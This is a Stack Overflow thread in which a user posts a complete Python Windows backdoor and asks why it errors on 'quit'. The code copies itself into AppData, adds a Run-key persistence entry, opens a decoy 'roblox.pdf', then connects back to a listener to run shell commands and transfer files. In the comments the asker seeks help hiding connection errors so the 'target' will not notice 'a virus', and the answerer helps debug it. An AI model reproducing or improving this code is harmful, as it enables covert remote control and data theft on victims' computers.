# OSError: [WinError 10038] An operation was attempted on something that is not a socket when trying to quit

Tags: python, python-3.x

```py
import socket
import subprocess
import simplejson
import os
import base64
import time
import shutil
import sys

class Registry:

    def __init__(self):
        self.new_file = os.environ["appdata"] + "\\sysupgrade.exe"
        self.added_file = sys._MEIPASS + "\\roblox.pdf"

    def add_to_registry(self):
        if not os.path.exists(self.new_file):
            shutil.copyfile(sys.executable,self.new_file)
            regedit_command = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v upgrade /t REG_SZ /d " + self.new_file
            subprocess.call(regedit_command, shell=True)

    def open_added_file(self):
        subprocess.Popen(self.added_file, shell=True)

    def start_registry(self):
        self.add_to_registry()
        self.open_added_file()
class MySocket:

    def __init__(self,ip,port):
        self.my_connection = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        self.my_connection.connect((ip,port))

    def json_send(self, data):
        json_data = simplejson.dumps(data)
        self.my_connection.send(json_data.encode("utf-8"))

    def json_receive(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.my_connection.recv(1024).decode()
                return simplejson.loads(json_data)
            except ValueError:
                continue

    def command_execution(self,command):
        return subprocess.check_output(command, shell=True)

    def execute_cd_command(self,directory):
        os.chdir(directory)
        return "Cd to " + directory

    def read_file(self,path):
        with open(path,"rb") as my_file:
            return base64.b64encode(my_file.read())

    def save_file(self,path,content):
        with open(path,"wb") as my_file:
            my_file.write(base64.b64decode(content))
            return "Upload OK!"

    def start_socket(self):
        while True:
            command = self.json_receive()
            try:
                if command[0] == "quit":
                    self.my_connection.close()
                    exit()
                elif command[0] == "cd" and len(command) > 1 :
                    command_output = self.execute_cd_command(command[1])
                elif command[0] == "download":
                    command_output = self.read_file(command[1])
                elif command[0] == "upload":
                    command_output = self.save_file(command[1],command[2])
                else:
                    command_output = self.command_execution(command)
                
            except Exception:
                command_output = "Error!"

            self.json_send(command_output)
        
        self.my_connection.close()

my_registry = Registry()
my_registry.start_registry()
my_socket_object = MySocket("10.0.2.4",4721)
my_socket_object.start_socket()
```

I run this socket in my windows and i run a program that listening this socket in kali linux. When i write quit i am getting this error. Normally i wasnt getting this error but when i added class Registry i started to get this error before that when i wrote quit i could quit both programs.Can anyone help me please?

Comment: Welcome to Stack Overflow! Please post code, data, and results as text, not screenshots ([how to format code in posts](https://stackoverflow.com/help/formatting)). [Why should I not upload images of code/data/errors?](https://meta.stackoverflow.com/questions/285551/why-should-i-not-upload-images-of-code-data-errors) http://idownvotedbecau.se/imageofcode

Answer (score 0, accepted):

It's your global `try/except`.  The `exit()` function raises an exception, which you are catching, thereby stopping the exit.  You then try to send the error output, which fails.  Just replace the two lines in the `'quit'` handler with `break`.  Let the function clean-up do the close.

Comment: I want to ask you a question too. Whenever target opens his computer i have to open my socketlistener too but let's say i didnt but this time target computer get error name "ConnectionRefusedError" how do i make the target not get this error

Comment: That's exactly the correct response when a client tries to access a port with no server.  What else could it possibly do?

Comment: Maybe i can write something that when this error pops up, program will colse and there will be no error because if that error comes target may understand that there is a virus in their  computer.

Comment: If you wrote the client application, then of course you can trap this condition and do whatever you want.  If it's a third-party app, then clearly there's nothing you can do.  This is a well-understood network error.  However, no one is going to think they have a virus because of this.

Comment: Last thing i know i wanted so much but please can you help me i wrote
"""
except ConnectionRefusedError:
       break
"""
but i'm still getting this error

Comment: WHERE did you put that code?  You clearly can't put that in the above program because this is the server.  That code would have to go in the client -- the code that is trying to make the connection.  The error happens because THIS code is not running.

Comment: Of course i put in client's program

Comment: Sorry, because you haven't shown any client code, I wasn't sure where you stood.  You need that code around the `connect` socket call.  Is that where you put it?  It may be time for another question.

Comment: Ok i'm asking another question and add there client's code

Comment: I  got it. Thanks for saying "You need that code around the connect socket call." i was putting in when executing. Thanks for everything